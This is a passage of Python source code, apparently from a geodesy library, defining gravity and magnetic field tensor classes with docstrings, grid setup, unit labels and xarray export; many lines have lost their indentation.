desc1 = 'Second invariant of the magnetic field tensor'
desc2 = 'Third invariant of the magnetic field tensor'
desc = 'Unitless invariant of the magnetic field tensor'
_i0 = self.i0.to_xarray(title=desc0,
long_name='$I_0$, Tr $V_{ii}$',
units=self._i0_units)
_i1 = self.i1.to_xarray(title=desc1, long_name='$I_1$',
units=self._i1_units)
_i2 = self.i2.to_xarray(title=desc2,
long_name='$I_2$, det $V_{ij}$',
units=self._i2_units)
_i = self.i.to_xarray(title=desc,
long_name='$-(I_2/2)^{2} / ' +
'(I_1/3)^{3}$',
units='none')
dataset['i0'] = _i0
dataset['i1'] = _i1
dataset['i2'] = _i2
dataset['i'] = _i
if self.eig1 is not None:
if isinstance(self, SHGravTensor):
desc1 = 'First eigenvalue of the gravity tensor'
desc2 = 'Second eigenvalue of the gravity tensor'
desc3 = 'Third eigenvalue of the gravity tensor'
else:
desc1 = 'First eigenvalue of the magnetic field tensor'
desc2 = 'Second eigenvalue of the magnetic field tensor'
desc3 = 'Third eigenvalue of the magnetic field tensor'
            _eig1 = self.eig1.to_xarray(title=desc1,
                                        long_name=r'${\lambda}_1$',
                                        units=self._vii_units)
            _eig2 = self.eig2.to_xarray(title=desc2,
                                        long_name=r'${\lambda}_2$',
                                        units=self._vii_units)
            _eig3 = self.eig3.to_xarray(title=desc3,
                                        long_name=r'${\lambda}_3$',
                                        units=self._vii_units)
dataset['eig1'] = _eig1
dataset['eig2'] = _eig2
dataset['eig3'] = _eig3
if self.eighh is not None:
if isinstance(self, SHGravTensor):
desc1 = 'First horizontal eigenvalue of the gravity tensor'
desc2 = 'Second horizontal eigenvalue of the gravity tensor'
desc3 = 'Combined horizontal eigenvalue of the gravity tensor'
else:
desc1 = 'First horizontal eigenvalue of the magnetic ' \
+ 'field tensor'
desc2 = 'Second horizontal eigenvalue of the magnetic ' \
+ 'field tensor'
desc3 = 'Combined horizontal eigenvalue of the magnetic ' \
+ 'field tensor'
            _eigh1 = self.eigh1.to_xarray(title=desc1,
                                          long_name=r'${\lambda}_{h1}$',
                                          units=self._vii_units)
            _eigh2 = self.eigh2.to_xarray(title=desc2,
                                          long_name=r'${\lambda}_{h2}$',
                                          units=self._vii_units)
            _eighh = self.eighh.to_xarray(title=desc3,
                                          long_name=r'${\lambda}_{hh}$',
                                          units=self._vii_units)
dataset['eigh1'] = _eigh1
dataset['eigh2'] = _eigh2
dataset['eighh'] = _eighh
return dataset
class SHGravTensor(Tensor):
"""
Class for the gravity field tensor and eigenvalues. The class is
initialized from a class instance of SHGravCoeffs using the method
tensor().
Attributes:
    vxx, vxy, vxz, : The 9 components of the gravity tensor.
vyx, vyy, vyz,
vzx, vzy, vzz
i0, i1, i2, i : The three invariants of the gravity tensor and a
derived quantity that is bounded between 0 and 1.
These are computed by a call to compute_invar().
eig1, eig2, eig3 : The three eigenvalues of the gravity tensor, which are
computed by a call to compute_eig().
eigh1, eigh2, : The horizontal eigenvalues of the gravity tensor, which
eighh are computed by a call to compute_eigh().
gm : The gravitational constant times the mass of the body.
a : Semimajor axis of the reference ellipsoid.
f : Flattening of the reference ellipsoid, f=(a-b)/a.
lmax : The maximum spherical harmonic degree resolvable by the
grids.
lmax_calc : The maximum spherical harmonic degree of the
gravitational potential used in creating the grids.
units : The units of the gridded data.
epoch : The epoch time of the gravity model.
nlat, nlon : The number of latitude and longitude bands in the grids.
n : The number of samples in latitude.
sampling : The longitudinal sampling for Driscoll and Healy grids.
Either 1 for equally sampled grids (nlat=nlon) or 2 for
equally spaced grids in degrees.
extend : True if the grid contains the redundant column for
360 E and the unnecessary row for 90 S.
Methods:
plot() : Plot all 9 components of the gravity tensor.
plot_vxx() : Plot the vxx component of the gravity tensor.
plot_vxy() : Plot the vxy component of the gravity tensor.
plot_vxz() : Plot the vxz component of the gravity tensor.
plot_vyx() : Plot the vyx component of the gravity tensor.
plot_vyy() : Plot the vyy component of the gravity tensor.
plot_vyz() : Plot the vyz component of the gravity tensor.
plot_vzx() : Plot the vzx component of the gravity tensor.
plot_vzy() : Plot the vzy component of the gravity tensor.
plot_vzz() : Plot the vzz component of the gravity tensor.
compute_invar() : Compute the invariants of the gravity tensor.
plot_i0() : Plot the first invariant I0 of the gravity tensor.
plot_i1() : Plot the second invariant I1 of the gravity tensor.
plot_i2() : Plot the third invariant I2 of the gravity tensor.
plot_i() : Plot the derived quantity I = -(I2/2)**2 / (I1/3)**3.
compute_eig() : Compute the three eigenvalues of the gravity tensor.
plot_eig() : Plot the three eigenvalues of the gravity tensor.
plot_eig1() : Plot the first eigenvalue of the gravity tensor.
plot_eig2() : Plot the second eigenvalue of the gravity tensor.
plot_eig3() : Plot the third eigenvalue of the gravity tensor.
compute_eigh() : Compute the horizontal eigenvalues of the gravity tensor.
plot_eigh() : Plot the two horizontal eigenvalues and the combined
maximum absolute eigenvalue of the gravity tensor.
plot_eigh1() : Plot the first horizontal eigenvalue of the gravity
tensor.
plot_eigh2() : Plot the second horizontal eigenvalue of the gravity
tensor.
plot_eighh() : Plot the combined maximum absolute eigenvalue of the
gravity tensor.
to_xarray() : Return an xarray DataSet of all gridded data.
copy() : Return a copy of the class instance.
info() : Print a summary of the data stored in the SHGravTensor
instance.
"""
def __init__(self, vxx, vyy, vzz, vxy, vxz, vyz, gm, a, f, lmax,
lmax_calc, units='Eötvös', epoch=None):
"""
Initialize the SHGravTensor class.
"""
self.vxx = _SHGrid.from_array(vxx, grid='DH', units=units)
self.vyy = _SHGrid.from_array(vyy, grid='DH', units=units)
self.vzz = _SHGrid.from_array(vzz, grid='DH', units=units)
self.vxy = _SHGrid.from_array(vxy, grid='DH', units=units)
self.vxz = _SHGrid.from_array(vxz, grid='DH', units=units)
self.vyz = _SHGrid.from_array(vyz, grid='DH', units=units)
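        # The tensor is symmetric, so the lower off-diagonal components
        # simply reference the grids of their upper counterparts.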
self.vyx = self.vxy
self.vzx = self.vxz
self.vzy = self.vyz
self.grid = self.vxx.grid
self.sampling = self.vxx.sampling
self.nlat = self.vxx.nlat
self.nlon = self.vxx.nlon
self.n = self.vxx.n
self.extend = self.vxx.extend
self.gm = gm
self.a = a
self.f = f
self.lmax = lmax
self.lmax_calc = lmax_calc
self.i0 = None
self.i1 = None
self.i2 = None
self.i = None
self.eig1 = None
self.eig2 = None
self.eig3 = None
self.eigh1 = None
self.eigh2 = None
self.eighh = None
self.units = units
self.epoch = epoch
self._vxx_label = '$V_{xx}$, ' + self.units
self._vxy_label = '$V_{xy}$, ' + self.units
self._vxz_label = '$V_{xz}$, ' + self.units
self._vyx_label = '$V_{yx}$, ' + self.units
self._vyy_label = '$V_{yy}$, ' + self.units
self._vyz_label = '$V_{yz}$, ' + self.units
self._vzx_label = '$V_{zx}$, ' + self.units
self._vzy_label = '$V_{zy}$, ' + self.units
self._vzz_label = '$V_{zz}$, ' + self.units
self._i0_label = 'Tr $V_{ii}$, ' + self.units
self._i1_label = '$I_1$, ' + self.units + '$^2$'
self._i2_label = 'det $V_{ij}$, ' + self.units + '$^3$'
self._i_label = '$-(I_2/2)^{2} / (I_1/3)^{3}$'
        self._eig1_label = r'$\lambda_1$, ' + self.units
        self._eig2_label = r'$\lambda_2$, ' + self.units
        self._eig3_label = r'$\lambda_3$, ' + self.units
        self._eigh1_label = r'$\lambda_{h1}$, ' + self.units
        self._eigh2_label = r'$\lambda_{h2}$, ' + self.units
        self._eighh_label = r'$\lambda_{hh}$, ' + self.units
        # Units strings referenced by to_xarray(); the values below are
        # assumed to follow the label conventions above, as they were not
        # otherwise defined in this class.
        self._vii_units = self.units
        self._i0_units = self.units
        self._i1_units = self.units + '$^2$'
        self._i2_units = self.units + '$^3$'
    def __repr__(self):
        s = ('grid = {:s}\n'
             'nlat = {:d}\n'
             'nlon = {:d}\n'
             'n = {:d}\n'
             'sampling = {:d}\n'
             'extend = {}\n'
             'lmax = {:d}\n'
             'lmax_calc = {:d}\n'
             'gm (m3 / s2) = {:e}\n'
             'a (m) = {:e}\n'
             'f = {:e}\n'
             'units = {:s}\n'
             'epoch = {:s}'
             .format(self.grid, self.nlat, self.nlon, self.n, self.sampling,
                     self.extend, self.lmax, self.lmax_calc, self.gm, self.a,
                     self.f, repr(self.units), repr(self.epoch)))
        return s
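# A minimal sketch of the tensor invariants referenced in the class
# docstrings (illustrative only; compute_invar() is the supported API).
# For a symmetric tensor V, I0 is the trace, I1 the sum of the principal
# 2x2 minors, I2 the determinant, and I = -(I2/2)**2 / (I1/3)**3:
#
#     def tensor_invariants(vxx, vyy, vzz, vxy, vxz, vyz):
#         i0 = vxx + vyy + vzz
#         i1 = (vxx*vyy + vyy*vzz + vxx*vzz
#               - vxy**2 - vyz**2 - vxz**2)
#         i2 = (vxx*(vyy*vzz - vyz**2) + vxy*(vyz*vxz - vxy*vzz)
#               + vxz*(vxy*vyz - vxz*vyy))
#         i = -(i2/2.)**2 / (i1/3.)**3
#         return i0, i1, i2, i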
class SHMagTensor(Tensor):
"""
Class for the magnetic field tensor and eigenvalues. The class is
initialized from a class instance of SHMagCoeffs using the method
tensor().
Attributes:
    vxx, vxy, vxz, : The 9 components of the magnetic field tensor.
vyx, vyy, vyz,
vzx, vzy, vzz
    i0, i1, i2, i : The three invariants of the magnetic field tensor and a
                    derived quantity that is bounded between 0 and 1.
                    These are computed by a call to compute_invar().
eig1, eig2, eig3 : The three eigenvalues of the magnetic field tensor,
which are computed by a call to compute_eig().
eigh1, eigh2, : The horizontal eigenvalues of the magnetic field
eighh tensor, which are computed by a call to compute_eigh().
a : Semimajor axis of the reference ellipsoid.
f : Flattening of the reference ellipsoid, f=(a-b)/a.
lmax : The maximum spherical harmonic degree resolvable by the
grids.
lmax_calc : The maximum spherical harmonic degree of the
magnetic potential used in creating the grids.
units : The units of the gridded data.
year : The year of the time-variable magnetic field data.
    nlat, nlon : The number of latitude and longitude bands in the grids.
    n : The number of samples in latitude.
    sampling : The longitudinal sampling for Driscoll and Healy grids.
               Either 1 for equally sampled grids (nlat=nlon) or 2 for
               equally spaced grids in degrees.
extend : True if the grid contains the redundant column for
360 E and the unnecessary row for 90 S.
Methods:
plot() : Plot all 9 components of the magnetic field tensor.
plot_vxx() : Plot the vxx component of the magnetic field tensor.
plot_vxy() : Plot the vxy component of the magnetic field tensor.
plot_vxz() : Plot the vxz component of the magnetic field tensor.
plot_vyx() : Plot the vyx component of the magnetic field tensor.
plot_vyy() : Plot the vyy component of the magnetic field tensor.
plot_vyz() : Plot the vyz component of the magnetic field tensor.
plot_vzx() : Plot the vzx component of the magnetic field tensor.
plot_vzy() : Plot the vzy component of the magnetic field tensor.
plot_vzz() : Plot the vzz component of the magnetic field tensor.
compute_invar() : Compute the invariants of the magnetic field tensor.
plot_i0() : Plot the first invariant I0 of the magnetic field tensor.
    plot_i1() : Plot the second invariant I1 of the magnetic field tensor.
plot_i2() : Plot the third invariant I2 of the magnetic field tensor.
plot_i() : Plot the derived quantity I = -(I2/2)**2 / (I1/3)**3.
compute_eig() : Compute the three eigenvalues of the magnetic field
tensor.
plot_eig() : Plot the three eigenvalues of the magnetic field tensor.
plot_eig1() : Plot the first eigenvalue of the magnetic field tensor.
plot_eig2() : Plot the second eigenvalue of the magnetic field tensor.
plot_eig3() : Plot the third eigenvalue of the magnetic field tensor.
compute_eigh() : Compute the horizontal eigenvalues of the magnetic field
tensor.
plot_eigh() : Plot the two horizontal eigenvalues and the combined
maximum absolute eigenvalue of the magnetic field tensor.
plot_eigh1() : Plot the first horizontal eigenvalue of the magnetic
field tensor.
plot_eigh2() : Plot the second horizontal eigenvalue of the magnetic
field tensor.
plot_eighh() : Plot the combined maximum absolute eigenvalue of the
magnetic field tensor.
to_xarray() : Return an xarray DataSet of all gridded data.
copy() : Return a copy of the class instance.
info() : Print a summary of the data stored in the SHMagTensor
instance.
"""
def __init__(self, vxx, vyy, vzz, vxy, vxz, vyz, a, f, lmax,
lmax_calc, units=None, year=None):
"""
Initialize the SHMagTensor class.
"""
self.vxx = _SHGrid.from_array(vxx, grid='DH', units=units)
self.vyy = _SHGrid.from_array(vyy, grid='DH', units=units)
self.vzz = _SHGrid.from_array(vzz, grid='DH', units=units)
self.vxy = _SHGrid.from_array(vxy, grid='DH', units=units)
self.vxz = _SHGrid.from_array(vxz, grid='DH', units=units)
self.vyz = _SHGrid.from_array(vyz, grid='DH', units=units)
self.vyx = self.vxy
self.vzx = self.vxz
self.vzy = self.vyz
self.grid = self.vxx.grid
self.sampling = self.vxx.sampling
self.nlat = self.vxx.nlat
self.nlon = self.vxx.nlon
self.n = self.vxx.n
self.extend = self.vxx.extend
self.a = a
self.f = f
self.lmax = lmax
self.lmax_calc = lmax_calc
self.i0 = None
self.i1 = None
self.i2 = None
self.i = None
self.eig1 = None
self.eig2 = None
self.eig3 = None
self.eigh1 = None
self.eigh2 = None
self.eighh = None
self.units = units
self.year = year
        # Guard against the default units=None before calling lower().
        if self.units is not None and self.units.lower() == 'nt/m':
            self._units_formatted = 'nT m$^{-1}$'
            self._i1_units = 'nT$^2$ m$^{-2}$'
            self._i2_units = 'nT$^3$ m$^{-3}$'
        else:
            self._units_formatted = 'T m$^{-1}$'
            self._i1_units = 'T$^2$ m$^{-2}$'
            self._i2_units = 'T$^3$ m$^{-3}$'
        # Units strings referenced by to_xarray(); assumed to match the
        # formatted units above, as they were not otherwise defined here.
        self._vii_units = self._units_formatted
        self._i0_units = self._units_formatted
self._vxx_label = '$V_{xx}$, ' + self._units_formatted
self._vxy_label = '$V_{xy}$, ' + self._units_formatted
self._vxz_label = '$V_{xz}$, ' + self._units_formatted
self._vyx_label = '$V_{yx}$, ' + self._units_formatted
self._vyy_label = '$V_{yy}$, ' + self._units_formatted
self._vyz_label = '$V_{yz}$, ' + self._units_formatted
self._vzx_label = '$V_{zx}$, ' + self._units_formatted
self._vzy_label = '$V_{zy}$, ' + self._units_formatted
self._vzz_label = '$V_{zz}$, ' + self._units_formatted
self._i0_label = 'Tr $V_{ii}$, ' + self._units_formatted
self._i1_label = '$I_1$, ' + self._i1_units
self._i2_label = 'det $V_{ij}$, ' + self._i2_units
self._i_label = '$-(I_2/2)^{2} / (I_1/3)^{3}$'
        self._eig1_label = r'$\lambda_1$, ' + self._units_formatted
        self._eig2_label = r'$\lambda_2$, ' + self._units_formatted
        self._eig3_label = r'$\lambda_3$, ' + self._units_formatted
        self._eigh1_label = r'$\lambda_{h1}$, ' + self._units_formatted
        self._eigh2_label = r'$\lambda_{h2}$, ' + self._units_formatted
        self._eighh_label = r'$\lambda_{hh}$, ' + self._units_formatted
    def __repr__(self):
        s = ('grid = {:s}\n'
             'nlat = {:d}\n'
             'nlon = {:d}\n'
             'n = {:d}\n'
             'sampling = {:d}\n'
             'extend = {}\n'
             'lmax = {:d}\n'
             'lmax_calc = {:d}\n'
             'a (m) = {:e}\n'
             'f = {:e}\n'
             'units = {:s}\n'
             'year = {:s}'
             .format(self.grid, self.nlat, self.nlon, self.n, self.sampling,
                     self.extend, self.lmax, self.lmax_calc, self.a,
                     self.f, repr(self.units), repr(self.year)))
        return s
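# A minimal usage sketch (hypothetical workflow; assumes 'clm' is an
# SHMagCoeffs instance created elsewhere):
#
#     tensor = clm.tensor()
#     tensor.compute_eig()
#     fig, ax = tensor.plot_vzz(show=False)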